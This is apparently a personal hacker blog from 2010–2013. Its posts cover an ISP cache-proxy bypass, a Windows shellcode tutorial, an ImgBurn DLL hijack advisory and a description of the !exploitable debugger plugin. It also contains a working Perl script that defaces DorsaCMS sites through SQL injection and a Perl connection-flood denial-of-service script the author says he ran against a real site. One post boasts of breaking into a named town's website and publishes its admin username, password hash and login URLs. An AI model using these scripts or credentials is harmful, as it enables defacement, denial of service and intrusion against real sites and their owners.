Wednesday, July 17, 2013

isp access restriction bypass via web cache proxy

today i want to explain a vulnerbility that i discovered in some isp web cache proxy's in iran.
i presented this vulnerability in first sharif university cyber security awareness conference
 ( http://cert.sharif.edu)
by using this vulnerability when isp closes your acount , you can brows web pages again !


what is web cache proxy ?
A web cache is a mechanism for the temporary storage (caching) of web documents, such as HTML pages and images, to reduce bandwidth usage, server load, and perceived lag. A web cache stores copies of documents passing through it; subsequent requests may be satisfied from the cache if certain conditions are met

dns redirect page
When the ISP's DNS server receives a request for a name that is not recognized or is unavailable, the DNS server returns the IP address of a search page to the client. When the client is using a web browser, this will display a search page that contains possible suggestions on the proper address and a small explanation of the error. These search pages often contain advertising that is paid to the ISP.


but how this vulnerability works ?!
 in this case isp restrics our access  to all web servers except one ,  and what is this one ?!!
this server is the same web cache proxy ! we have access to the ip of web cache proxy but any http request can be executed over the ip of web cache proxy !


for example i want to see a web page ( like farsnews.com ) and now i must make an http request over the ip of web cache(dns redirect server ) that i have access to it :


and you can see the web page is loaded successfully !

i tested this vulnerbility in largest private ISP in Iran (parsonline.com) and recorded a demo that you can see here :

the vulnerability is now fixed on pars online but another isp may be affected !

Tuesday, May 31, 2011

simple windows shellcoding

in this post i want to show a simple way to making shellcodes under windows operating system

debuggers can help us to a fast shellcoding and test our shellcodes
do you remember exe file injection method ? in this method we must find a free code area in the exe file , called code cave .
in the code cave we can insert assembly instructions , and run it !
after inserting our codes , we must change the address of instruction pointer to the beginning of our codes address

ok , i guess you understand the method that i want to use
let's go !
i want make a MessageBox shellcode that shows d3c0der !


for conversion your word ( that you want show by shellcode ) to hex , you can use this site :
http://centricle.com/tools/ascii-hex/
this is an axample of  conversion the " d3c0der " word :





it is a simple code in assembly language :


xor eax,eax

xor ebx,ebx

xor ecx,ecx

xor edx,edx

mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
push 0
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
push 0
mov eax,user32.messageboxa
call eax


the codecave area :


now i insert this codes into the debugger :


the first instruction that i use is " xor eax,eax "
and this addres is : 01010D47 ( we use it for changing EIP )

take a look at the registers window , and look the instruction pointer address .


go to this address :


and replace the " push 60 " with " JMP 01010D47 "


now  run the program , you can see the d3c0der message .

but there is a problem , null bytes ! shellcodes must be free from null bytes .
wich part of our code makes null bytes ?!
it is " push 0 "
we can use an old technique for remove null byte
by replacing " push 0 " with
xor ecx,ecx
push ecx
we can solve this problem , and our final shellcode is :

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
xor ecx,ecx
push ecx
mov eax,user32.messageboxa
call eax


good luck!

Sunday, February 6, 2011

how hillsboro beach website hacked ?

 few weeks ago i read a news on foxnews about an american website :

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

i logged in website and found the bug , in this post i want to show vulnerability of  this site :d

 let's go !
first , home page :

            sql  error :

            number of selected column is incorrect :

           mysql version :


           username and password :d :


user : tohbadministrator
pass : 481a91595db92d57

and login pages :
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

i have a message for foxnews , they are not iranian pro hackers ! they are some basiji script kiddies . . .
good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

I have found a vulnerability in ImgBurn that could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully qualified path to a dynamic-linked library (dwmapi.dll) when running on Microsoft Windows. By persuading a victim to open a specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a specially-crafted library to execute arbitrary code on the system.







IN THE NEWS :

http://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm
http://www.zerodaylab.com/vulnerabilities/CVE-2011/CVE-2011-0403.html




    Thursday, December 16, 2010

    DorsaCms SQL Injection Vulnerability

    Dorsa is a cms that have certificate of security

    u can see certificate of security from this link :
    http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

    but  i found  a blind SQL Injection Vulnerability in this CMS 

    http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

    exploit code(tested on windows xp ) :


    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    system('title DorsaCMS Defacer');
    print q{
    ===================================================
    -= ** =-
    DorsaCMS Defacer

    [+] Coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
    -= ** =-
    ===================================================


    };

    use HTTP::Request;
    use LWP::UserAgent;



    print "~# Target : ";
    $site=<STDIN>;
    chomp $site;
    print "~# PageID : ";
    $id=<STDIN>;
    chomp $id;
     print "~# Deface Text : ";
    $def=<STDIN>;
    chomp $def;

    if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
    }
    if ( $site !~ /\/$/ ) {
    $site = $site . '/';
    }
    print "\n";

    print "->hacking : $site\n";




    @path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

    foreach $ways(@path1){

    $final=$site.$ways;

    my $req=HTTP::Request->new(GET=>$final);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    my $response=$ua->request($req);


    }

    print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";




    ##
    # By d3c0der
    ##


    .

    Thursday, December 2, 2010

    simple d.o.s attacker

    Hi,
    I wrote a simple perl denial of service script 

    I've got it working on windows xp with active perl
    i used this script to attacking the my sql port of a security website , and here is the result ;)



    please use this code FOR EDUCATIONAL PURPOSES  ONLY

    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    print q{
    ===================================================
    -= ** =-
    AttackerZ d.o.s Attacker - version 1.0

    [+] coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
    -= ** =-

    ===>  FOR EDUCATIONAL PURPOSES  ONLY <===

    ===================================================


    };

    use IO::Socket;

    print "Host: ";{
    chop ($host = <stdin>);
    print "Port: ";
    chop ($port = <stdin>);
    print "SYN Requests to send : ";
    chop ($num= <stdin>);
    }
    if(defined($ARGV[2])){
    $host = $ARGV[0];
    $port = $ARGV[1];
    $num = $ARGV[2];
    }
    for ($i=0; $i<$num; $i++)
    {
    $len = length $form;
    $sock = IO::Socket::INET->new (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "$! sorry ! Can't Connect";
    syswrite STDOUT, "[+]SYN Request: $i\n";
    }
    $local_time = localtime();

    $login = getlogin();
    print " hello $login , your attack finish at $local_time\n";

    print "All packets sent to $host\n";

     print "Press any key To exit...";
    $end = <STDIN>;
    chop ($end);

    Wednesday, November 24, 2010

    !exploitable Crash Analyzer

    !exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.


    0:006> g
    (19ec.1a0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
    eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
    41414141 ??              ???
    0:001> !load msec.dll
    0:001> !exploitable
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
    Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
    
    Access violations at the instruction pointer are exploitable if not near NULL.


    The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to: http://www.codeplex.com/msecdbg.

    download video :